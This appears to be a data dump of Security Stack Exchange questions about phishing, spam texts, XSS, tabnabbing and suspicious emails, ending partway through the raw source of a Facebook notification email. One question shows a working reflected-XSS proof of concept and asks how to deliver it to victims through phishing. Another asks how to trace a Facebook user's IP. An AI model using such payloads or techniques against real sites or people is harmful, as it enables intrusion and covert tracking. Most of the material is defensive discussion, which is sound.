    <t>&lt;p&gt;Yesterday I received a group text message from a number I don't know and opened it by mistake. I was in a group chat with two other people, one in Pennsylvania one in Massachusetts. The message body was the phrase "knows what" and attached was a file called &lt;code&gt;voicenote.amr&lt;/code&gt;. The file was a 5 or so second clip of what sounded like paper rustling. &lt;/p&gt;
 &lt;p&gt;My question is what is the point of a spam text like that and what information could I have disclosed by accidentally opening it? I've gotten spam texts in the past but they are usually some sort of phishing.&lt;/p&gt;
 &lt;p&gt;EDIT: I am running Andriod version 4.4.4 and using the default texting app called "Messaging" it is also version 4.4.4. It handles both group and regular texts.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>Trace facebook user ip. Is it even possible?</t>
  </si>
  <si>
    <t>&lt;p&gt;As I know facebook chat is working like &lt;code&gt;user &amp;lt;&amp;gt; server &amp;lt;&amp;gt; user&lt;/code&gt; and it's not P2P. I was talking with some guys today and they were pretty sure it's possible to &lt;code&gt;netstat&lt;/code&gt; a facebook user IP address. I'm not familiar how FB chat works, but I highly doubt they're using P2P in their chat. So my question is it possible to &lt;code&gt;netstat&lt;/code&gt; a facebook IP, or any way to find his IP without sending a link or using any phishing tools?&lt;/p&gt;
 &lt;p&gt;Most of the articles in the google results, says this is actually possible: &lt;a href="https://www.google.bg/search?q=facebook%20stack&amp;amp;oq=facebook%20stack&amp;amp;aqs=chrome..69i57j69i59j69i65j69i60l2j0.2038j0j4&amp;amp;sourceid=chrome&amp;amp;espv=210&amp;amp;es_sm=122&amp;amp;ie=UTF-8#es_sm=122&amp;amp;espv=210&amp;amp;q=get%20ip%20of%20facebook%20user&amp;amp;safe=off&amp;amp;start=10" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;facebook&gt;&lt;ip&gt;&lt;user-tracking&gt;</t>
  </si>
  <si>
    <t>How the inability to modify the title of javascript alert() function helps in anti-phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I was using javascript in one of my web apps and wanted to display an alert on the screen using the function &lt;code&gt;alert("some message")&lt;/code&gt; with a custom title.&lt;/p&gt;
 &lt;p&gt;example:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/qpbEn.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/qpbEn.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;but as suggested by many websites, it is not possible since it is a security/anti-phishing feature of js.&lt;/p&gt;
 &lt;p&gt;Can somebody please explain, how the above mentioned feature contributes towards security (anti-phishing) in the web app?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;javascript&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How browser detects Phishing Pages?</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to know how browsers detect phishing pages.And also what methodology browsers use to detect phishing pages?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Reflected XSS via JSON executed with Burp, but how to do it in realistic conditions?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am testing a scenario with Burp proxy.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;I am located on a website &lt;code&gt;https://website.com/web&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;There's an option there to delete an item, when you click it , a certain POST request is sent (&lt;code&gt;XMLHttpRequest&lt;/code&gt;, no page refresh is happening) where I can insert a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; tag:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;POST /web/deleteItem HTTP/1.1
 Host: website.com
 returnParameter=&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;code&gt;deleteItem&lt;/code&gt; method returns the following:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;HTTP/1.1 200 OK
 Date: Tue, 31 Jan 2017 22:18:54 GMT
 X-XSS-Protection: 1; mode=block
 Content-Type: application/json;charset=UTF-8
 ...
 {"status":"SUCCESS","result":"&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;"}
 &lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;On a website from step #1 there are JavaScript functions that parse the JSON and show its result value on the screen &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;code&gt;alert&lt;/code&gt; is being shown on &lt;code&gt;https://website.com/web&lt;/code&gt;, so reflected XSS was successfully executed. &lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;But this scenario is not realistic as I need to draw a user to the website and execute the XSS somehow. &lt;/p&gt;
 &lt;p&gt;I have tried this by making a simple HTML POST form and submitting the parameters to &lt;code&gt;https://website.com/web/deleteItem&lt;/code&gt;. Lets say that I would use phishing and user would submit the form.&lt;/p&gt;
 &lt;p&gt;The action was indeed executed, but I only received a &lt;em&gt;JSON&lt;/em&gt; response. There was no page from step #1, so nothing was actually shown as XSS, because the user was not located on &lt;code&gt;https://website.com/web&lt;/code&gt; where &lt;code&gt;alert('XSS')&lt;/code&gt; should be executed. I am not sure is it possible to send the user to page #1 and send it this JSON with XSS somehow. &lt;/p&gt;
 &lt;p&gt;Could there be a way to execute this scenario in realistic conditions? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;xss&gt;&lt;ajax&gt;&lt;json&gt;&lt;black-box&gt;</t>
  </si>
  <si>
    <t>Name of security measure that shows user a personal word / phrase / drawing</t>
  </si>
  <si>
    <t>&lt;p&gt;I remember a security measure I've seen on a few sites in the past against phishing, but I don't know what it's called. When the user logs in, or just inputs their username, the site shows some kind of secret word / phrase / drawing. That word / phrase / drawing is something the user always sees, so it's proof for them that they're talking to the real site.&lt;/p&gt;
 &lt;p&gt;I know that American Express uses it, and I've seen a few other sites in the past use it too.&lt;/p&gt;
 &lt;p&gt;Does anyone know what it's called?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;defense&gt;&lt;terminology&gt;</t>
  </si>
  <si>
    <t>Wouldn't looking at the address in the URL address bar in your browser defeat "tabnabbing"?</t>
  </si>
  <si>
    <t>&lt;p&gt;Considering &lt;a href="https://security.stackexchange.com/questions/136227/what-is-tabnabbing"&gt;this question about tabnabbing&lt;/a&gt;, and looking at both of the demos, located &lt;a href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/" rel="nofollow noreferrer"&gt;here&lt;/a&gt; provided by Sjoerd in his answer, and located &lt;a href="http://isis.poly.edu/~eitan/tn-poc/page.html" rel="nofollow noreferrer"&gt;here&lt;/a&gt; provided by Daniel in a comment, all I had to do was to take a look at the URL address bar in my browser (firefox) and I could see clearly that it wasn't www.google.com.&lt;/p&gt;
 &lt;p&gt;Is this all it takes to defeat tabnabbing? Or can there be more sophisticated attacks where the URL can be faked as well, to show www.google.com while the page displayed is a fake google log-in page?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;exploit&gt;&lt;attack-prevention&gt;</t>
  </si>
  <si>
    <t>Strange apple dns answers</t>
  </si>
  <si>
    <t>&lt;p&gt;Could someone please explain to the results of a reverse DNS lookup I ran? &lt;code&gt;dig -x 17.178.96.59&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;I was expecting apple.com but it also listed a whole load of PTR's. Many looked like phishing sites like icloudc.om and jtunes.com for instance. All have a very high TTL as well.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Append query string parameters to form.action or a.href using Javascript?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have an HTML page which is accepting any number of query string parameters, which I need to pass on to the next page the user visits by clicking links on my page. Basically, if the user comes to&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://example.com/some/page.html?param1=123&amp;amp;param2=567&amp;amp;smthelse=abcde 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Most of these query string parameters have tracking nature. I need to make sure that when the user clicks on certain links on this page or submits certain POST forms, all these query strings are passed along to the subsequent page.&lt;/p&gt;
 &lt;p&gt;If possible I am looking to avoid whitelisting/blacklisting query string parameters which should be allowed to be passed to the next page, as it is a lot of maintenance. Instead, I am planning to use jQuery/Javascript to dynamically read all query strings, and update anchors' href attributes and forms' action attributes to append the entire &lt;code&gt;window.location.search&lt;/code&gt; value to these URLs.&lt;/p&gt;
 &lt;p&gt;Example (&lt;a href="https://output.jsbin.com/tatagizimo?test1=1,test2=2" rel="nofollow noreferrer"&gt;jsbin&lt;/a&gt;):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$(document).ready(function() {
  var pageQsParams = window.location.search.split('?')[1] || '';
  var newLinkUrl = $('.link').attr('href') + (pageQsParams ? '?' + pageQsParams : '');
  $('.link').attr('href', newLinkUrl);
  var newFormUrl = $('#form').attr('action') + (pageQsParams ? '?' + pageQsParams : '');
  $('#form').attr('action', newFormUrl);
 }); 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;is this code vulnerable to XSS or phishing? Any other security vulnerability? Any better way to do it? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;xss&gt;&lt;javascript&gt;&lt;phishing&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>How does someone know i clicked a link in an email? URL spoofing? JSON?</t>
  </si>
  <si>
    <t>&lt;p&gt;How do hackers/scammers know that I clicked a link? Why is my personal info in the url redirect link? Is this info then being stored in a database and the hacker/scammer knows that because this specific link was clicked it must have been me?&lt;/p&gt;
 &lt;p&gt;I received a dodgy email with a link and was curious. So I activated my &lt;em&gt;VPN&lt;/em&gt; and checked the link first on &lt;em&gt;VirusTotal&lt;/em&gt; and &lt;em&gt;dr web&lt;/em&gt;. I found out that the link redirected several times to different websites. &lt;/p&gt;
 &lt;p&gt;I have changed the link numbers and letters but the domain is how I received it as you see below.&lt;/p&gt;
 &lt;p&gt;The original link sent to me looked like:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://gallery.divinerosestore.com/SOME_LETTERS_AND_NUMBERS
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What freaked me out was that the second redirect url contained my email address in the url link. It was in a weird format separated by commas (,) the link below is not real but is in a format as such:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;hdating.us/?s=77auyfdgaukgfdsukg&amp;amp;ed=icl&amp;amp;i=admin77,83907,MY_EMAIL_ADDRESS@service.com,&amp;amp;ts=489234987459
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;How I imagine this works is that this information of my email address is being passed on to user "admin77" stored in his database/textfile whatever and he knows that I have clicked his link and he now knows I am susceptible to clicking links and a future target?&lt;/p&gt;
 &lt;p&gt;I would like to inform myself more about cybersecurity and find out more about the details.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;http&gt;&lt;phishing&gt;&lt;url-redirection&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Can Firefox master password dialog be used for phishing my master password?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have used master password to protect my login information in Firefox. Whenever I first start Firefox and open a page requiring authentication information Firefox asks my master password before filling authentication information to the login page.&lt;/p&gt;
 &lt;p&gt;I recently opened a page (through a link from another page) that is not a login page nor should need any login information which was weird. Of course I did not provide my master password.&lt;/p&gt;
 &lt;p&gt;Now this could be some problem in that web page's scripts but it made me think that if it is possible that some website could create a similar popup window to phish my master password?&lt;/p&gt;
 &lt;p&gt;And if it is possible how could I distinct a phishing popup form the &amp;quot;official&amp;quot; Firefox one?&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;Of course if the page is not one of my trusted sites and login page I never provide any authorization information.&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;firefox&gt;&lt;web&gt;</t>
  </si>
  <si>
    <t>How can mobile sign-on be secured from imposter authentication screens?</t>
  </si>
  <si>
    <t>&lt;p&gt;History seems to have come almost full circle where old issues are shown in new/emerging technologies.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Background&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;If you trust the operating system, Windows originally had the Control - Alt - Delete as a way to prevent TSR (Terminate and Stay Resident) programs from stealing passwords. It also invoked a GINA now the Windows Secure Subsystem (whatever it's called these days).&lt;/p&gt;
 &lt;p&gt;If you trust the browser, Web browsers proved security using SSL/TLS/HTTPS icons in the browser, and sometimes they colored the status bar green for sites that overpaid for their SSL certificate.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Now that &lt;a href="https://security.stackexchange.com/a/9381/396"&gt;mobile devices don't display a HTTPS status bar&lt;/a&gt; when navigating it's impossible to tell if you're on a legit site, or hacked via SSLStrip MITM or HTTPS. On top of that, there isn't a secure mode integrated into the OS itself, therefore it seems next to impossible to distinguish a legit authentication dialog from an imposter. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Can you tell the imposter from the legit dialog?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/x8JMQ.gif" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/x8JMQ.gif" alt="Windows Mobile, Android, iOS login screens to Azure AD"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Although I demonstrate Azure Active Directory federation above, the same issue applies to consumer and corporate accounts that leverage other systems (OAuth, OpenID, Facebook, Ping Identity, ADFS)&lt;/p&gt;
 &lt;p&gt;This issue came to my mind as I downloaded an Android app that was clearly phishing for my credentials so it could post a favorable review of itself. ... a App Review Worm of sorts.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;How can a dumb end user protect themselves from such an attack, on a mobile device? &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Are &lt;a href="https://security.stackexchange.com/q/33124/396"&gt;physical certificates&lt;/a&gt; the only option to prevent phishing? (TLS Mutual Auth)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Does FIDO play a role in securing the mobile space?&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;mobile&gt;&lt;man-in-the-middle&gt;&lt;sslstrip&gt;&lt;fido&gt;</t>
  </si>
  <si>
    <t>What's the risk in downloading a .pdf from a phishing email?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've received an email which is an obvious phishing attempt. However, a .pdf has been attached which I want to open, just out of curiosity!&lt;/p&gt;
 &lt;p&gt;What are the risks in downloading .pdf files from unknown sources? Can .pdf's be harmful to my phone or computer, or is it just an attempt to look like it's come from a legitimate source?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;mobile&gt;&lt;virus&gt;&lt;pdf&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>Are there any two way + two factor authentication systems in use?</t>
  </si>
  <si>
    <t>&lt;p&gt;My bank, Google etc. use two factor systems where they send me a One Time Password via out of band means. e.g. SMS or an App on my Cellphone or a standalone RSA token generator. &lt;/p&gt;
 &lt;p&gt;This seems good except that it is vulnerable to a phishing attempt / rouge site that can get me to enter the OTP &amp;amp; then use it on the fly to get access. &lt;/p&gt;
 &lt;p&gt;I was wondering, would it be safer if the genuine log in page was supposed to also display a short, time-dependent reverse PIN that I could then match against a similar PIN on my out of channel device before I entered the real PIN on the website. Would that be a good way to verify that the site asking for the token is authentic?&lt;/p&gt;
 &lt;p&gt;Is this naive? Or would it improve things? If so, is it already being done by any sites / protocols? &lt;/p&gt;
 &lt;p&gt;PS. I think the secure fobs like FIDO U2F etc. do take care of this. But I am thinking of a way to secure a legacy SMS / Android app system that generates the 2nd factor. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;one-time-password&gt;</t>
  </si>
  <si>
    <t>Is this Facebook email real or phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received this email from what is supposedly Facebook today. Here's a screenshot:
 &lt;a href="https://i.stack.imgur.com/SFvFq.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/SFvFq.png" alt="email"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I was not aware I had credits or credits existed on Facebook and apparently I have $2.30 worth. It looks legitimate at first glance, the email address looks like all the other Facebook emails I get but I have a few reasons to believe this is fake and a phishing attempt.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;All of the links on the page, which I haven't clicked on by the way,
 when hovering over and getting a preview of the link in the bottom
 left corner, aren't actual URLs, just directories I think. The
 Facebook header link points to &lt;code&gt;setting?tab=payments&lt;/code&gt;. The review
 your balance link is the same thing. The app center link is just
 &lt;code&gt;appcenter&lt;/code&gt;. Perhaps a failed phishing attempt or the email team
 messed up, not something Facebook would do.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The email style of the header, and background doesn't look anything
 like the legitimate emails I get from Facebook. To see what I mean,
 take a look at this email I got a couple days ago.&lt;a href="https://i.stack.imgur.com/j2M4J.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/j2M4J.png" alt="two"&gt;&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;As you can see, the top blue bar is a solid blue bar, unlike the gradiented bar on the first email. The background is white not grey like the first one. And it's not full width like the first one. The styles are similar but the first one looks a little older than the one I got a couple days ago which has a flatter look.&lt;/p&gt;
 &lt;p&gt;Is this email legitimate or is it some sort of failed phishing attempt? &lt;/p&gt;
 &lt;p&gt;Edit: here is the source code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Delivered-To: myEmail@gmail.com
 Received: by 10.64.208.67 with SMTP id mc3csp215958iec;
  Mon, 28 Jul 2014 11:18:02 -0700 (PDT)
 X-Received: by 10.68.191.194 with SMTP id ha2mr5567506pbc.143.1406571481784;
  Mon, 28 Jul 2014 11:18:01 -0700 (PDT)
 Return-Path: &amp;lt;notification+kr4mqmknaean@facebookmail.com&amp;gt;
 Received: from mx-out.facebook.com (outmail021.prn2.facebook.com. [66.220.144.148])
  by mx.google.com with ESMTPS id bg5si3360342pdb.468.2014.07.28.11.18.01
  for &amp;lt;myEmail@gmail.com&amp;gt;
  (version=TLSv1 cipher=ECDHE-RSA-RC4-SHA bits=128/128);
  Mon, 28 Jul 2014 11:18:01 -0700 (PDT)
 Received-SPF: pass (google.com: domain of notification+kr4mqmknaean@facebookmail.com designates 66.220.144.148 as permitted sender) client-ip=66.220.144.148;
 Authentication-Results: mx.google.com;
  spf=pass (google.com: domain of notification+kr4mqmknaean@facebookmail.com designates 66.220.144.148 as permitted sender) smtp.mail=notification+kr4mqmknaean@facebookmail.com;
  dkim=pass header.i=@facebookmail.com;
  dmarc=pass (p=REJECT dis=NONE) header.from=facebookmail.com
 Received: from facebook.com (f2hk/PLxoaEIT/fBlhT+zd5nnjzhUaEeZHCH61uLXXqwZpYsw2Ru1XBNzDHLgndM 10.103.99.61)
  by facebook.com with Thrift id 8297627c168311e4a87a0002c992c8ec-5c5fb400;
  Mon, 28 Jul 2014 11:18:01 -0700
 X-Facebook: from 10.83.48.31 ([MTI3LjAuMC4x]) 
  by async.facebook.com with HTTP (ZuckMail);
 Date: Mon, 28 Jul 2014 11:18:01 -0700
 Return-Path: notification+kr4mqmknaean@facebookmail.com
 To: Milo Gosnell &amp;lt;myEmail@gmail.com&amp;gt;
 From: "Facebook" &amp;lt;notification+kr4mqmknaean@facebookmail.com&amp;gt;
 Reply-to: noreply &amp;lt;noreply@facebookmail.com&amp;gt;
 Subject: You have $2.30 in your Facebook account
 Message-ID: &amp;lt;e97806d65a32ea0f70f0cadf5f5df3e6@async.facebook.com&amp;gt;
 X-Priority: 3
 X-Mailer: ZuckMail [version 1.00]
 Errors-To: notification+kr4mqmknaean@facebookmail.com
 X-Facebook-Notify: payment_credits_to_lc_balance; mailid=a409107G5af3188d358eG0G28eG21014dad
 X-FACEBOOK-PRIORITY: 0
 X-Auto-Response-Suppress: All
 MIME-Version: 1.0
 Content-Type: multipart/alternative;
  boundary="b1_e97806d65a32ea0f70f0cadf5f5df3e6"
 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=facebookmail.com;
  s=s1024-2013-q3; t=1406571481;
  bh=be0apt2xjA3K0VqNAhrb4AJp1qqCmG/w36+vycpp3b0=;
  h=Date:To:From:Subject:MIME-Version:Content-Type;
  b=gvByiMKxQpl/GjtzE2LzNHOd+5W8bsyhfNbUTzr8H6s3HbLYShCJnW1nSWtJCzdpd
  srNFP6R7b7QkCsANFCq0wTLxHqnA0JsEyq6ys9ZviAX3SAAUxm8Gve1+KCpHWPYifX
  Eqa2Jjzo13vN73niZb3KQGxwMFKZOWbM+GTxhV5w=
 --b1_e97806d65a32ea0f70f0cadf5f5df3e6
 Content-Type: text/plain; charset="UTF-8"
 Content-Transfer-Encoding: quoted-printable
 Hi Milo,
 Facebook has changed from credits to local currency. You have $2.30 in =
 your account. You can review your balance or use this money on apps or =
 games in the App Center.
 Thanks,
 The Facebook Payments Team
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 This message was sent to myEmail@gmail.com. If you don't want to receive =
 these emails from Facebook in the future, please follow the link below to =
 unsubscribe.
 https://www.facebook.com/o.php?k=3DAS3FhR4P3qzdS6JW&amp;amp;u=3D100000135460238&amp;amp;mi=
 d=3Da409107G5af3188d358eG0G28eG21014dad
 Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA =
 94303
 --b1_e97806d65a32ea0f70f0cadf5f5df3e6
 Content-Type: text/html; charset="UTF-8"
 Content-Transfer-Encoding: quoted-printable
 &amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional =
 //EN"&amp;gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;Facebook&amp;lt;/title&amp;gt;&amp;lt;meta http-equiv=3D"Content-Type" =
 content=3D"text/html; charset=3Dutf-8" =
 /&amp;gt;&amp;lt;style&amp;gt;body{background:#e0e1e5;font-family:'Helvetica =
 Neue',Helvetica,'Lucida Grande',tahoma,verdana,arial,sans-serif;font-weigh=
 t:300}a{color:#333;text-decoration:none;white-space:nowrap =
 !important}#email_table{width:100% !important}#email_content{padding:0 =
 !important}#profile_pic =
 img{border:0}*[class].usercard{background:#fff}@media all and =
 (max-device-width: 720px){a{white-space:pre-wrap =
 !important}table[bgcolor=3D"#e9eaed"]{background:transparent =
 !important}*[id]#body_container{border-bottom:1px solid #e5e5e5 =
 !important}table[width=3D"610"],*[id]#body_container,*[id]#cta_container{t=
 able-layout:fixed}*[id]#cta_outer{border:none !important}*[id]#header_prof=
 ile&amp;gt;table&amp;gt;tbody&amp;gt;tr&amp;gt;td:not(:nth-child(4)){display:none =
 !important}*[id]#profile_name{display:none}*[id]#profile_pic{-moz-border-r=
 adius:3px !important;-webkit-border-radius:3px =
 !important;border-radius:3px !important;border-width:0 =
 !important;overflow:hidden}*[id]#header_title{width:auto =
 !important}*[id]#header_profile{width:24px}*[class].bio{display:none =
 !important}*[id]#main_content{width:100%}*[class].content&amp;gt;div =
 a{display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap =
 !important;width:160px}*[class].ext{padding-right:20px}*[class].image =
 a{display:block;margin-left:20px}*[class].cta_btn,*[class].scnd_btn{displa=
 y:block}*[id]#email_cta&amp;gt;tbody&amp;gt;tr&amp;gt;td[width=3D"100%"]{display:none}}@media =
 all and (device-width: 720px){table[width=3D"610"],*[id]#body_container,*[=
 id]#footer_container{width:340px}*[id]#email_filler td{height:12px =
 !important}*[class].usercard{width:300px !important}}@media all and =
 (max-device-width: =
 480px){*[id]#cta_container&amp;gt;table&amp;gt;tbody&amp;gt;tr&amp;gt;td[height=3D"15"]{display:none =
 !important}}@media all and (device-width: 320px){table[width=3D"610"],*[id=
 ]#body_container,*[id]#cta_container{min-width:400px;width:auto}center{pad=
 ding:0 10px}*[class].content&amp;gt;div a{width:182px}}&amp;lt;/style&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body =
 style=3D"margin:0;padding:0;" dir=3D"ltr"&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" id=3D"email_table" =
 style=3D"border-collapse:collapse;width:98%;" border=3D"0"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 id=3D"email_content" style=3D"font-family:&amp;amp;#039;lucida =
 grande&amp;amp;#039;,tahoma,verdana,arial,sans-serif;font-size:12px;padding:0px;ba=
 ckground:#e0e1e5;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" =
 width=3D"100%" border=3D"0" =
 style=3D"border-collapse:collapse;width:100%;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;padding:0;border-left:none;border-right:none;border-top:none;border=
 -bottom:none;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"padding:0;width:100%;"&amp;gt;&amp;lt;span style=3D"color:#FFFFFF;display:none =
 !important;font-size:1px;"&amp;gt;Hi Milo, Facebook has changed from credits to =
 local currency. You have $2.30 in your account. You can review your =
 balance or use this money on apps or games in the App Center . Thanks, The =
 Facebook Payments Team&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"padding:0;width:100%;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" =
 width=3D"100%" bgcolor=3D"#435E9C" style=3D"border-collapse:collapse;width=
 :100%;background:#435E9C;background-image:-webkit-linear-gradient(top, =
 #5c77b5, #435e9c);border-color:#0A1F4F;border-style:solid;border-width:0px =
 0px 1px 0px;box-shadow:0 1px 1px rgba(0, 0, 0, 0.25);height:47px;" =
 id=3D"header"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D""&amp;gt;&amp;lt;center&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" width=3D"610" height=3D"44" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td align=3D"left" =
 id=3D"header_title" style=3D"width:100%;line-height:47px;"&amp;gt;&amp;lt;table =
 cellspacing=3D"0" cellpadding=3D"0" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;td style=3D""&amp;gt;&amp;lt;a =
 href=3D"/settings?tab=3Dpayments" style=3D"color:#FFFFFF;text-decoration:n=
 one;font-weight:bold;font-family:lucida grande,tahoma,verdana,arial,sans-s=
 erif;vertical-align:baseline;font-size:20px;letter-spacing:-0.03em;text-al=
 ign:left;text-shadow:0 1px 0 rgba(0, 0, 0, 0.24);"&amp;gt; facebook &amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td =
 width=3D"10" style=3D"width:10px;"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td style=3D""&amp;gt;&amp;lt;font =
 color=3D"white" size=3D"3"&amp;gt;&amp;lt;a =
 style=3D"color:#ffffff;text-decoration:none;font-family:Helvetica =
 Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:16p=
 x;font-weight:bold;text-shadow:0 -1px rgba(34, 59, 115, =
 0.85);vertical-align:middle;" href=3D"/settings?tab=3Dpayments"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/font=
 &amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/center&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;=
 td style=3D"padding:0;width:100%;"&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" width=3D"100%" bgcolor=3D"#e0e1e5" id=3D"table_color" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;td style=3D""&amp;gt;&amp;lt;table =
 cellspacing=3D"0" cellpadding=3D"0" width=3D"100%" id=3D"email_filler" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;td height=3D"19" =
 style=3D""&amp;gt;&amp;amp;nbsp;&amp;lt;/td&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;center&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" width=3D"610" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td align=3D"left" =
 id=3D"body_container" style=3D"background-color:#ffffff;border-color:#c1c2=
 c4;border-style:solid;display:block;border-width:1px;border-radius:5px;-we=
 bkit-border-radius:5px;-moz-border-radius:5px;box-shadow:0 1px 1px rgba(0, =
 0, 0, 0.10);overflow:hidden;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" =
